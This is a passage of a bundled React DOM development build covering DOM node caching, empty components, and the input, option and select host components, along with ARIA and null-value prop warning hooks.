nodeID + ' ';\n}\n\n/**\n * Drill down (through composites and empty components) until we get a host or\n * host text component.\n *\n * This is pretty polymorphic but unavoidable with the current structure we have\n * for `_renderedChildren`.\n */\nfunction getRenderedHostOrTextFromComponent(component) {\n  var rendered;\n  while (rendered = component._renderedComponent) {\n    component = rendered;\n  }\n  return component;\n}\n\n/**\n * Populate `_hostNode` on the rendered host/text component with the given\n * DOM node. The passed `inst` can be a composite.\n */\nfunction precacheNode(inst, node) {\n  var hostInst = getRenderedHostOrTextFromComponent(inst);\n  hostInst._hostNode = node;\n  node[internalInstanceKey] = hostInst;\n}\n\nfunction uncacheNode(inst) {\n  var node = inst._hostNode;\n  if (node) {\n    delete node[internalInstanceKey];\n    inst._hostNode = null;\n  }\n}\n\n/**\n * Populate `_hostNode` on each child of `inst`, assuming that the children\n * match up with the DOM (element) children of `node`.\n *\n * We cache entire levels at once to avoid an n^2 problem where we access the\n * children of a node sequentially and have to walk from the start to our target\n * node every time.\n *\n * Since we update `_renderedChildren` and the actual DOM at (slightly)\n * different times, we could race here and see a newer `_renderedChildren` than\n * the DOM nodes we see. To avoid this, ReactMultiChild calls\n * `prepareToManageChildren` before we change `_renderedChildren`, at which\n * time the container's child nodes are always cached (until it unmounts).\n */\nfunction precacheChildNodes(inst, node) {\n  if (inst._flags & Flags.hasCachedChildNodes) {\n    return;\n  }\n  var children = inst._renderedChildren;\n  var childNode = node.firstChild;\n  outer: for (var name in children) {\n    if (!children.hasOwnProperty(name)) {\n      continue;\n    }\n    var childInst = children[name];\n    var childID = getRenderedHostOrTextFromComponent(childInst)._domID;\n    if (childID === 0) {\n      // We're currently unmounting this child in ReactMultiChild; skip it.\n      continue;\n    }\n    // We assume the child nodes are in the same order as the child instances.\n    for (; childNode !== null; childNode = childNode.nextSibling) {\n      if (shouldPrecacheNode(childNode, childID)) {\n        precacheNode(childInst, childNode);\n        continue outer;\n      }\n    }\n    // We reached the end of the DOM children without finding an ID match.\n    !false ? \"development\" !== 'production' ? invariant(false, 'Unable to find element with ID %s.', childID) : _prodInvariant('32', childID) : void 0;\n  }\n  inst._flags |= Flags.hasCachedChildNodes;\n}\n\n/**\n * Given a DOM node, return the closest ReactDOMComponent or\n * ReactDOMTextComponent instance ancestor.\n */\nfunction getClosestInstanceFromNode(node) {\n  if (node[internalInstanceKey]) {\n    return node[internalInstanceKey];\n  }\n\n  // Walk up the tree until we find an ancestor whose instance we have cached.\n  var parents = [];\n  while (!node[internalInstanceKey]) {\n    parents.push(node);\n    if (node.parentNode) {\n      node = node.parentNode;\n    } else {\n      // Top of the tree. This node must not be part of a React tree (or is\n      // unmounted, potentially).\n      return null;\n    }\n  }\n\n  var closest;\n  var inst;\n  for (; node && (inst = node[internalInstanceKey]); node = parents.pop()) {\n    closest = inst;\n    if (parents.length) {\n      precacheChildNodes(inst, node);\n    }\n  }\n\n  return closest;\n}\n\n/**\n * Given a DOM node, return the ReactDOMComponent or ReactDOMTextComponent\n * instance, or null if the node was not rendered by this React.\n */\nfunction getInstanceFromNode(node) {\n  var inst = getClosestInstanceFromNode(node);\n  if (inst != null && inst._hostNode === node) {\n    return inst;\n  } else {\n    return null;\n  }\n}\n\n/**\n * Given a ReactDOMComponent or ReactDOMTextComponent, return the corresponding\n * DOM node.\n */\nfunction getNodeFromInstance(inst) {\n  // Without this first invariant, passing a non-DOM-component triggers the next\n  // invariant for a missing parent, which is super confusing.\n  !(inst._hostNode !== undefined) ? \"development\" !== 'production' ? invariant(false, 'getNodeFromInstance: Invalid argument.') : _prodInvariant('33') : void 0;\n\n  if (inst._hostNode) {\n    return inst._hostNode;\n  }\n\n  // Walk up the tree until we find an ancestor whose DOM node we have cached.\n  var parents = [];\n  while (!inst._hostNode) {\n    parents.push(inst);\n    !inst._hostParent ? \"development\" !== 'production' ? invariant(false, 'React DOM tree root should always have a node reference.') : _prodInvariant('34') : void 0;\n    inst = inst._hostParent;\n  }\n\n  // Now parents contains each ancestor that does *not* have a cached native\n  // node, and `inst` is the deepest ancestor that does.\n  for (; parents.length; inst = parents.pop()) {\n    precacheChildNodes(inst, inst._hostNode);\n  }\n\n  return inst._hostNode;\n}\n\nvar ReactDOMComponentTree = {\n  getClosestInstanceFromNode: getClosestInstanceFromNode,\n  getInstanceFromNode: getInstanceFromNode,\n  getNodeFromInstance: getNodeFromInstance,\n  precacheChildNodes: precacheChildNodes,\n  precacheNode: precacheNode,\n  uncacheNode: uncacheNode\n};\n\nmodule.exports = ReactDOMComponentTree;\n},{\"11\":11,\"126\":126,\"152\":152,\"33\":33}],35:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar validateDOMNesting = _dereq_(132);\n\nvar DOC_NODE_TYPE = 9;\n\nfunction ReactDOMContainerInfo(topLevelWrapper, node) {\n  var info = {\n    _topLevelWrapper: topLevelWrapper,\n    _idCounter: 1,\n    _ownerDocument: node ? node.nodeType === DOC_NODE_TYPE ? node : node.ownerDocument : null,\n    _node: node,\n    _tag: node ? node.nodeName.toLowerCase() : null,\n    _namespaceURI: node ? node.namespaceURI : null\n  };\n  if (\"development\" !== 'production') {\n    info._ancestorInfo = node ? validateDOMNesting.updatedAncestorInfo(null, info._tag, null) : null;\n  }\n  return info;\n}\n\nmodule.exports = ReactDOMContainerInfo;\n},{\"132\":132}],36:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar DOMLazyTree = _dereq_(9);\nvar ReactDOMComponentTree = _dereq_(34);\n\nvar ReactDOMEmptyComponent = function (instantiate) {\n  // ReactCompositeComponent uses this:\n  this._currentElement = null;\n  // ReactDOMComponentTree uses these:\n  this._hostNode = null;\n  this._hostParent = null;\n  this._hostContainerInfo = null;\n  this._domID = 0;\n};\n_assign(ReactDOMEmptyComponent.prototype, {\n  mountComponent: function (transaction, hostParent, hostContainerInfo, context) {\n    var domID = hostContainerInfo._idCounter++;\n    this._domID = domID;\n    this._hostParent = hostParent;\n    this._hostContainerInfo = hostContainerInfo;\n\n    var nodeValue = ' react-empty: ' + this._domID + ' ';\n    if (transaction.useCreateElement) {\n      var ownerDocument = hostContainerInfo._ownerDocument;\n      var node = ownerDocument.createComment(nodeValue);\n      ReactDOMComponentTree.precacheNode(this, node);\n      return DOMLazyTree(node);\n    } else {\n      if (transaction.renderToStaticMarkup) {\n        // Normally we'd insert a comment node, but since this is a situation\n        // where React won't take over (static pages), we can simply return\n        // nothing.\n        return '';\n      }\n      return '<!--' + nodeValue + '-->';\n    }\n  },\n  receiveComponent: function () {},\n  getHostNode: function () {\n    return ReactDOMComponentTree.getNodeFromInstance(this);\n  },\n  unmountComponent: function () {\n    ReactDOMComponentTree.uncacheNode(this);\n  }\n});\n\nmodule.exports = ReactDOMEmptyComponent;\n},{\"160\":160,\"34\":34,\"9\":9}],37:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactDOMFeatureFlags = {\n  useCreateElement: true,\n  useFiber: false\n};\n\nmodule.exports = ReactDOMFeatureFlags;\n},{}],38:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMChildrenOperations = _dereq_(8);\nvar ReactDOMComponentTree = _dereq_(34);\n\n/**\n * Operations used to process updates to DOM nodes.\n */\nvar ReactDOMIDOperations = {\n  /**\n   * Updates a component's children by processing a series of updates.\n   *\n   * @param {array<object>} updates List of update configurations.\n   * @internal\n   */\n  dangerouslyProcessChildrenUpdates: function (parentInst, updates) {\n    var node = ReactDOMComponentTree.getNodeFromInstance(parentInst);\n    DOMChildrenOperations.processUpdates(node, updates);\n  }\n};\n\nmodule.exports = ReactDOMIDOperations;\n},{\"34\":34,\"8\":8}],39:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126),\n    _assign = _dereq_(160);\n\nvar DOMPropertyOperations = _dereq_(12);\nvar LinkedValueUtils = _dereq_(24);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactUpdates = _dereq_(82);\n\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\nvar didWarnValueLink = false;\nvar didWarnCheckedLink = false;\nvar didWarnValueDefaultValue = false;\nvar didWarnCheckedDefaultChecked = false;\nvar didWarnControlledToUncontrolled = false;\nvar didWarnUncontrolledToControlled = false;\n\nfunction forceUpdateIfMounted() {\n  if (this._rootNodeID) {\n    // DOM component is still mounted; update\n    ReactDOMInput.updateWrapper(this);\n  }\n}\n\nfunction isControlled(props) {\n  var usesChecked = props.type === 'checkbox' || props.type === 'radio';\n  return usesChecked ? props.checked != null : props.value != null;\n}\n\n/**\n * Implements an <input> host component that allows setting these optional\n * props: `checked`, `value`, `defaultChecked`, and `defaultValue`.\n *\n * If `checked` or `value` are not supplied (or null/undefined), user actions\n * that affect the checked state or value will trigger updates to the element.\n *\n * If they are supplied (and not null/undefined), the rendered element will not\n * trigger updates to the element. Instead, the props must change in order for\n * the rendered element to be updated.\n *\n * The rendered element will be initialized as unchecked (or `defaultChecked`)\n * with an empty value (or `defaultValue`).\n *\n * @see http://www.w3.org/TR/2012/WD-html5-20121025/the-input-element.html\n */\nvar ReactDOMInput = {\n  getHostProps: function (inst, props) {\n    var value = LinkedValueUtils.getValue(props);\n    var checked = LinkedValueUtils.getChecked(props);\n\n    var hostProps = _assign({\n      // Make sure we set .type before any other properties (setting .value\n      // before .type means .value is lost in IE11 and below)\n      type: undefined,\n      // Make sure we set .step before .value (setting .value before .step\n      // means .value is rounded on mount, based upon step precision)\n      step: undefined,\n      // Make sure we set .min & .max before .value (to ensure proper order\n      // in corner cases such as min or max deriving from value, e.g. Issue #7170)\n      min: undefined,\n      max: undefined\n    }, props, {\n      defaultChecked: undefined,\n      defaultValue: undefined,\n      value: value != null ? value : inst._wrapperState.initialValue,\n      checked: checked != null ? checked : inst._wrapperState.initialChecked,\n      onChange: inst._wrapperState.onChange\n    });\n\n    return hostProps;\n  },\n\n  mountWrapper: function (inst, props) {\n    if (\"development\" !== 'production') {\n      LinkedValueUtils.checkPropTypes('input', props, inst._currentElement._owner);\n\n      var owner = inst._currentElement._owner;\n\n      if (props.valueLink !== undefined && !didWarnValueLink) {\n        \"development\" !== 'production' ? warning(false, '`valueLink` prop on `input` is deprecated; set `value` and `onChange` instead.') : void 0;\n        didWarnValueLink = true;\n      }\n      if (props.checkedLink !== undefined && !didWarnCheckedLink) {\n        \"development\" !== 'production' ? warning(false, '`checkedLink` prop on `input` is deprecated; set `value` and `onChange` instead.') : void 0;\n        didWarnCheckedLink = true;\n      }\n      if (props.checked !== undefined && props.defaultChecked !== undefined && !didWarnCheckedDefaultChecked) {\n        \"development\" !== 'production' ? warning(false, '%s contains an input of type %s with both checked and defaultChecked props. ' + 'Input elements must be either controlled or uncontrolled ' + '(specify either the checked prop, or the defaultChecked prop, but not ' + 'both). Decide between using a controlled or uncontrolled input ' + 'element and remove one of these props. More info: ' + 'https://fb.me/react-controlled-components', owner && owner.getName() || 'A component', props.type) : void 0;\n        didWarnCheckedDefaultChecked = true;\n      }\n      if (props.value !== undefined && props.defaultValue !== undefined && !didWarnValueDefaultValue) {\n        \"development\" !== 'production' ? warning(false, '%s contains an input of type %s with both value and defaultValue props. ' + 'Input elements must be either controlled or uncontrolled ' + '(specify either the value prop, or the defaultValue prop, but not ' + 'both). Decide between using a controlled or uncontrolled input ' + 'element and remove one of these props. More info: ' + 'https://fb.me/react-controlled-components', owner && owner.getName() || 'A component', props.type) : void 0;\n        didWarnValueDefaultValue = true;\n      }\n    }\n\n    var defaultValue = props.defaultValue;\n    inst._wrapperState = {\n      initialChecked: props.checked != null ? props.checked : props.defaultChecked,\n      initialValue: props.value != null ? props.value : defaultValue,\n      listeners: null,\n      onChange: _handleChange.bind(inst),\n      controlled: isControlled(props)\n    };\n  },\n\n  updateWrapper: function (inst) {\n    var props = inst._currentElement.props;\n\n    if (\"development\" !== 'production') {\n      var controlled = isControlled(props);\n      var owner = inst._currentElement._owner;\n\n      if (!inst._wrapperState.controlled && controlled && !didWarnUncontrolledToControlled) {\n        \"development\" !== 'production' ? warning(false, '%s is changing an uncontrolled input of type %s to be controlled. ' + 'Input elements should not switch from uncontrolled to controlled (or vice versa). ' + 'Decide between using a controlled or uncontrolled input ' + 'element for the lifetime of the component. More info: https://fb.me/react-controlled-components', owner && owner.getName() || 'A component', props.type) : void 0;\n        didWarnUncontrolledToControlled = true;\n      }\n      if (inst._wrapperState.controlled && !controlled && !didWarnControlledToUncontrolled) {\n        \"development\" !== 'production' ? warning(false, '%s is changing a controlled input of type %s to be uncontrolled. ' + 'Input elements should not switch from controlled to uncontrolled (or vice versa). ' + 'Decide between using a controlled or uncontrolled input ' + 'element for the lifetime of the component. More info: https://fb.me/react-controlled-components', owner && owner.getName() || 'A component', props.type) : void 0;\n        didWarnControlledToUncontrolled = true;\n      }\n    }\n\n    // TODO: Shouldn't this be getChecked(props)?\n    var checked = props.checked;\n    if (checked != null) {\n      DOMPropertyOperations.setValueForProperty(ReactDOMComponentTree.getNodeFromInstance(inst), 'checked', checked || false);\n    }\n\n    var node = ReactDOMComponentTree.getNodeFromInstance(inst);\n    var value = LinkedValueUtils.getValue(props);\n    if (value != null) {\n      if (value === 0 && node.value === '') {\n        node.value = '0';\n        // Note: IE9 reports a number inputs as 'text', so check props instead.\n      } else if (props.type === 'number') {\n        // Simulate `input.valueAsNumber`. IE9 does not support it\n        var valueAsNumber = parseFloat(node.value, 10) || 0;\n\n        if (\n        // eslint-disable-next-line\n        value != valueAsNumber ||\n        // eslint-disable-next-line\n        value == valueAsNumber && node.value != value) {\n          // Cast `value` to a string to ensure the value is set correctly. While\n          // browsers typically do this as necessary, jsdom doesn't.\n          node.value = '' + value;\n        }\n      } else if (node.value !== '' + value) {\n        // Cast `value` to a string to ensure the value is set correctly. While\n        // browsers typically do this as necessary, jsdom doesn't.\n        node.value = '' + value;\n      }\n    } else {\n      if (props.value == null && props.defaultValue != null) {\n        // In Chrome, assigning defaultValue to certain input types triggers input validation.\n        // For number inputs, the display value loses trailing decimal points. For email inputs,\n        // Chrome raises \"The specified value <x> is not a valid email address\".\n        //\n        // Here we check to see if the defaultValue has actually changed, avoiding these problems\n        // when the user is inputting text\n        //\n        // https://github.com/facebook/react/issues/7253\n        if (node.defaultValue !== '' + props.defaultValue) {\n          node.defaultValue = '' + props.defaultValue;\n        }\n      }\n      if (props.checked == null && props.defaultChecked != null) {\n        node.defaultChecked = !!props.defaultChecked;\n      }\n    }\n  },\n\n  postMountWrapper: function (inst) {\n    var props = inst._currentElement.props;\n\n    // This is in postMount because we need access to the DOM node, which is not\n    // available until after the component has mounted.\n    var node = ReactDOMComponentTree.getNodeFromInstance(inst);\n\n    // Detach value from defaultValue. We won't do anything if we're working on\n    // submit or reset inputs as those values & defaultValues are linked. They\n    // are not resetable nodes so this operation doesn't matter and actually\n    // removes browser-default values (eg \"Submit Query\") when no value is\n    // provided.\n\n    switch (props.type) {\n      case 'submit':\n      case 'reset':\n        break;\n      case 'color':\n      case 'date':\n      case 'datetime':\n      case 'datetime-local':\n      case 'month':\n      case 'time':\n      case 'week':\n        // This fixes the no-show issue on iOS Safari and Android Chrome:\n        // https://github.com/facebook/react/issues/7233\n        node.value = '';\n        node.value = node.defaultValue;\n        break;\n      default:\n        node.value = node.value;\n        break;\n    }\n\n    // Normally, we'd just do `node.checked = node.checked` upon initial mount, less this bug\n    // this is needed to work around a chrome bug where setting defaultChecked\n    // will sometimes influence the value of checked (even after detachment).\n    // Reference: https://bugs.chromium.org/p/chromium/issues/detail?id=608416\n    // We need to temporarily unset name to avoid disrupting radio button groups.\n    var name = node.name;\n    if (name !== '') {\n      node.name = '';\n    }\n    node.defaultChecked = !node.defaultChecked;\n    node.defaultChecked = !node.defaultChecked;\n    if (name !== '') {\n      node.name = name;\n    }\n  }\n};\n\nfunction _handleChange(event) {\n  var props = this._currentElement.props;\n\n  var returnValue = LinkedValueUtils.executeOnChange(props, event);\n\n  // Here we use asap to wait until all updates have propagated, which\n  // is important when using controlled components within layers:\n  // https://github.com/facebook/react/issues/1698\n  ReactUpdates.asap(forceUpdateIfMounted, this);\n\n  var name = props.name;\n  if (props.type === 'radio' && name != null) {\n    var rootNode = ReactDOMComponentTree.getNodeFromInstance(this);\n    var queryRoot = rootNode;\n\n    while (queryRoot.parentNode) {\n      queryRoot = queryRoot.parentNode;\n    }\n\n    // If `rootNode.form` was non-null, then we could try `form.elements`,\n    // but that sometimes behaves strangely in IE8. We could also try using\n    // `form.getElementsByName`, but that will only return direct children\n    // and won't include inputs that use the HTML5 `form=` attribute. Since\n    // the input might not even be in a form, let's just use the global\n    // `querySelectorAll` to ensure we don't miss anything.\n    var group = queryRoot.querySelectorAll('input[name=' + JSON.stringify('' + name) + '][type=\"radio\"]');\n\n    for (var i = 0; i < group.length; i++) {\n      var otherNode = group[i];\n      if (otherNode === rootNode || otherNode.form !== rootNode.form) {\n        continue;\n      }\n      // This will throw if radio buttons rendered by different copies of React\n      // and the same name are rendered into the same form (same as #1939).\n      // That's probably okay; we don't support it just as we don't support\n      // mixing React radio buttons with non-React ones.\n      var otherInstance = ReactDOMComponentTree.getInstanceFromNode(otherNode);\n      !otherInstance ? \"development\" !== 'production' ? invariant(false, 'ReactDOMInput: Mixing React and non-React radio inputs with the same `name` is not supported.') : _prodInvariant('90') : void 0;\n      // If this is a controlled radio button group, forcing the input that\n      // was previously checked to update will cause it to be come re-checked\n      // as appropriate.\n      ReactUpdates.asap(forceUpdateIfMounted, otherInstance);\n    }\n  }\n\n  return returnValue;\n}\n\nmodule.exports = ReactDOMInput;\n},{\"12\":12,\"126\":126,\"152\":152,\"159\":159,\"160\":160,\"24\":24,\"34\":34,\"82\":82}],40:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar DOMProperty = _dereq_(11);\nvar ReactComponentTreeHook = _dereq_(133);\n\nvar warning = _dereq_(159);\n\nvar warnedProperties = {};\nvar rARIA = new RegExp('^(aria)-[' + DOMProperty.ATTRIBUTE_NAME_CHAR + ']*$');\n\nfunction validateProperty(tagName, name, debugID) {\n  if (warnedProperties.hasOwnProperty(name) && warnedProperties[name]) {\n    return true;\n  }\n\n  if (rARIA.test(name)) {\n    var lowerCasedName = name.toLowerCase();\n    var standardName = DOMProperty.getPossibleStandardName.hasOwnProperty(lowerCasedName) ? DOMProperty.getPossibleStandardName[lowerCasedName] : null;\n\n    // If this is an aria-* attribute, but is not listed in the known DOM\n    // DOM properties, then it is an invalid aria-* attribute.\n    if (standardName == null) {\n      warnedProperties[name] = true;\n      return false;\n    }\n    // aria-* attributes should be lowercase; suggest the lowercase version.\n    if (name !== standardName) {\n      \"development\" !== 'production' ? warning(false, 'Unknown ARIA attribute %s. Did you mean %s?%s', name, standardName, ReactComponentTreeHook.getStackAddendumByID(debugID)) : void 0;\n      warnedProperties[name] = true;\n      return true;\n    }\n  }\n\n  return true;\n}\n\nfunction warnInvalidARIAProps(debugID, element) {\n  var invalidProps = [];\n\n  for (var key in element.props) {\n    var isValid = validateProperty(element.type, key, debugID);\n    if (!isValid) {\n      invalidProps.push(key);\n    }\n  }\n\n  var unknownPropString = invalidProps.map(function (prop) {\n    return '`' + prop + '`';\n  }).join(', ');\n\n  if (invalidProps.length === 1) {\n    \"development\" !== 'production' ? warning(false, 'Invalid aria prop %s on <%s> tag. ' + 'For details, see https://fb.me/invalid-aria-prop%s', unknownPropString, element.type, ReactComponentTreeHook.getStackAddendumByID(debugID)) : void 0;\n  } else if (invalidProps.length > 1) {\n    \"development\" !== 'production' ? warning(false, 'Invalid aria props %s on <%s> tag. ' + 'For details, see https://fb.me/invalid-aria-prop%s', unknownPropString, element.type, ReactComponentTreeHook.getStackAddendumByID(debugID)) : void 0;\n  }\n}\n\nfunction handleElement(debugID, element) {\n  if (element == null || typeof element.type !== 'string') {\n    return;\n  }\n  if (element.type.indexOf('-') >= 0 || element.props.is) {\n    return;\n  }\n\n  warnInvalidARIAProps(debugID, element);\n}\n\nvar ReactDOMInvalidARIAHook = {\n  onBeforeMountComponent: function (debugID, element) {\n    if (\"development\" !== 'production') {\n      handleElement(debugID, element);\n    }\n  },\n  onBeforeUpdateComponent: function (debugID, element) {\n    if (\"development\" !== 'production') {\n      handleElement(debugID, element);\n    }\n  }\n};\n\nmodule.exports = ReactDOMInvalidARIAHook;\n},{\"11\":11,\"133\":133,\"159\":159}],41:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactComponentTreeHook = _dereq_(133);\n\nvar warning = _dereq_(159);\n\nvar didWarnValueNull = false;\n\nfunction handleElement(debugID, element) {\n  if (element == null) {\n    return;\n  }\n  if (element.type !== 'input' && element.type !== 'textarea' && element.type !== 'select') {\n    return;\n  }\n  if (element.props != null && element.props.value === null && !didWarnValueNull) {\n    \"development\" !== 'production' ? warning(false, '`value` prop on `%s` should not be null. ' + 'Consider using the empty string to clear the component or `undefined` ' + 'for uncontrolled components.%s', element.type, ReactComponentTreeHook.getStackAddendumByID(debugID)) : void 0;\n\n    didWarnValueNull = true;\n  }\n}\n\nvar ReactDOMNullInputValuePropHook = {\n  onBeforeMountComponent: function (debugID, element) {\n    handleElement(debugID, element);\n  },\n  onBeforeUpdateComponent: function (debugID, element) {\n    handleElement(debugID, element);\n  }\n};\n\nmodule.exports = ReactDOMNullInputValuePropHook;\n},{\"133\":133,\"159\":159}],42:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar React = _dereq_(135);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactDOMSelect = _dereq_(43);\n\nvar warning = _dereq_(159);\nvar didWarnInvalidOptionChildren = false;\n\nfunction flattenChildren(children) {\n  var content = '';\n\n  // Flatten children and warn if they aren't strings or numbers;\n  // invalid types are ignored.\n  React.Children.forEach(children, function (child) {\n    if (child == null) {\n      return;\n    }\n    if (typeof child === 'string' || typeof child === 'number') {\n      content += child;\n    } else if (!didWarnInvalidOptionChildren) {\n      didWarnInvalidOptionChildren = true;\n      \"development\" !== 'production' ? warning(false, 'Only strings and numbers are supported as <option> children.') : void 0;\n    }\n  });\n\n  return content;\n}\n\n/**\n * Implements an <option> host component that warns when `selected` is set.\n */\nvar ReactDOMOption = {\n  mountWrapper: function (inst, props, hostParent) {\n    // TODO (yungsters): Remove support for `selected` in <option>.\n    if (\"development\" !== 'production') {\n      \"development\" !== 'production' ? warning(props.selected == null, 'Use the `defaultValue` or `value` props on <select> instead of ' + 'setting `selected` on <option>.') : void 0;\n    }\n\n    // Look up whether this option is 'selected'\n    var selectValue = null;\n    if (hostParent != null) {\n      var selectParent = hostParent;\n\n      if (selectParent._tag === 'optgroup') {\n        selectParent = selectParent._hostParent;\n      }\n\n      if (selectParent != null && selectParent._tag === 'select') {\n        selectValue = ReactDOMSelect.getSelectValueContext(selectParent);\n      }\n    }\n\n    // If the value is null (e.g., no specified value or after initial mount)\n    // or missing (e.g., for <datalist>), we don't change props.selected\n    var selected = null;\n    if (selectValue != null) {\n      var value;\n      if (props.value != null) {\n        value = props.value + '';\n      } else {\n        value = flattenChildren(props.children);\n      }\n      selected = false;\n      if (Array.isArray(selectValue)) {\n        // multiple\n        for (var i = 0; i < selectValue.length; i++) {\n          if ('' + selectValue[i] === value) {\n            selected = true;\n            break;\n          }\n        }\n      } else {\n        selected = '' + selectValue === value;\n      }\n    }\n\n    inst._wrapperState = { selected: selected };\n  },\n\n  postMountWrapper: function (inst) {\n    // value=\"\" should make a value attribute (#6219)\n    var props = inst._currentElement.props;\n    if (props.value != null) {\n      var node = ReactDOMComponentTree.getNodeFromInstance(inst);\n      node.setAttribute('value', props.value);\n    }\n  },\n\n  getHostProps: function (inst, props) {\n    var hostProps = _assign({ selected: undefined, children: undefined }, props);\n\n    // Read state only from initial mount because <select> updates value\n    // manually; we need the initial state only for server rendering\n    if (inst._wrapperState.selected != null) {\n      hostProps.selected = inst._wrapperState.selected;\n    }\n\n    var content = flattenChildren(props.children);\n\n    if (content) {\n      hostProps.children = content;\n    }\n\n    return hostProps;\n  }\n};\n\nmodule.exports = ReactDOMOption;\n},{\"135\":135,\"159\":159,\"160\":160,\"34\":34,\"43\":43}],43:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar LinkedValueUtils = _dereq_(24);\nvar ReactDOMComponentTree = _dereq_(34);\nvar ReactUpdates = _dereq_(82);\n\nvar warning = _dereq_(159);\n\nvar didWarnValueLink = false;\nvar didWarnValueDefaultValue = false;\n\nfunction updateOptionsIfPendingUpdateAndMounted() {\n  if (this._rootNodeID && this._wrapperState.pendingUpdate) {\n    this._wrapperState.pendingUpdate = false;\n\n    var props = this._currentElement.props;\n    var value = LinkedValueUtils.getValue(props);\n\n    if (value != null) {\n      updateOptions(this, Boolean(props.multiple), value);\n    }\n  }\n}\n\nfunction getDeclarationErrorAddendum(owner) {\n  if (owner) {\n    var name = owner.getName();\n    if (name) {\n      return ' Check the render method of `' + name + '`.';\n    }\n  }\n  return '';\n}\n\nvar valuePropNames = ['value', 'defaultValue'];\n\n/**\n * Validation function for `value` and `defaultValue`.\n * @private\n */\nfunction checkSelectPropTypes(inst, props) {\n  var owner = inst._currentElement._owner;\n  LinkedValueUtils.checkPropTypes('select', props, owner);\n\n  if (props.valueLink !== undefined && !didWarnValueLink) {\n    \"development\" !== 'production' ? warning(false, '`valueLink` prop on `select` is deprecated; set `value` and `onChange` instead.') : void 0;\n    didWarnValueLink = true;\n  }\n\n  for (var i = 0; i < valuePropNames.length; i++) {\n    var propName = valuePropNames[i];\n    if (props[propName] == null) {\n      continue;\n    }\n    var isArray = Array.isArray(props[propName]);\n    if (props.multiple && !isArray) {\n      \"development\" !== 'production' ? warning(false, 'The `%s` prop supplied to <select> must be an array if ' + '`multiple` is true.%s', propName, getDeclarationErrorAddendum(owner)) : void 0;\n    } else if (!props.multiple && isArray) {\n      \"development\" !== 'production' ? warning(false, 'The `%s` prop supplied to <select> must be a scalar ' + 'value if `multiple` is false.%s', propName, getDeclarationErrorAddendum(owner)) : void 0;\n    }\n  }\n}\n\n/**\n * @param {ReactDOMComponent} inst\n * @param {boolean} multiple\n * @param {*} propValue A stringable (with `multiple`, a list of stringables).\n * @private\n */\nfunction updateOptions(inst, multiple, propValue) {\n  var selectedValue, i;\n  var options = ReactDOMComponentTree.getNodeFromInstance(inst).options;\n\n  if (multiple) {\n    selectedValue = {};\n    for (i = 0; i < propValue.length; i++) {\n      selectedValue['' + propValue[i]] = true;\n    }\n    for (i = 0; i < options.length; i++) {\n      var selected = selectedValue.hasOwnProperty(options[i].value);\n      if (options[i].selected !== selected) {\n        options[i].selected = selected;\n      }\n    }\n  } else {\n    // Do not set `select.value` as exact behavior isn't consistent across all\n    // browsers for all cases.\n    selectedValue = '' + propValue;\n    for (i = 0; i < options.length; i++) {\n      if (options[i].value === selectedValue) {\n        options[i].selected = true;\n        return;\n      }\n    }\n    if (options.length) {\n      options[0].selected = true;\n    }\n  }\n}\n\n/**\n * Implements a <select> host component that allows optionally setting the\n * props `value` and `defaultValue`. If `multiple` is false, the prop must be a\n * stringable. If `multiple` is true, the prop must be an array of stringables.\n *\n * If `value` is not supplied (or null/undefined), user actions that change the\n * selected option will trigger updates to the rendered options.\n *\n * If it is supplied (and not null/undefined), the rendered options will not\n * update in response to user actions. Instead, the `value` prop must change in\n * order for the rendered options to update.\n *\n * If `defaultValue` is provided, any options with the supplied values will be\n * selected.\n */\nvar ReactDOMSelect = {\n  getHostProps: function (inst, props) {\n    return _assign({}, props, {\n      onChange: inst._wrapperState.onChange,\n      value: undefined\n    });\n  },\n\n  mountWrapper: function (inst, props) {\n    if (\"development\" !== 'production') {\n      checkSelectPropTypes(inst, 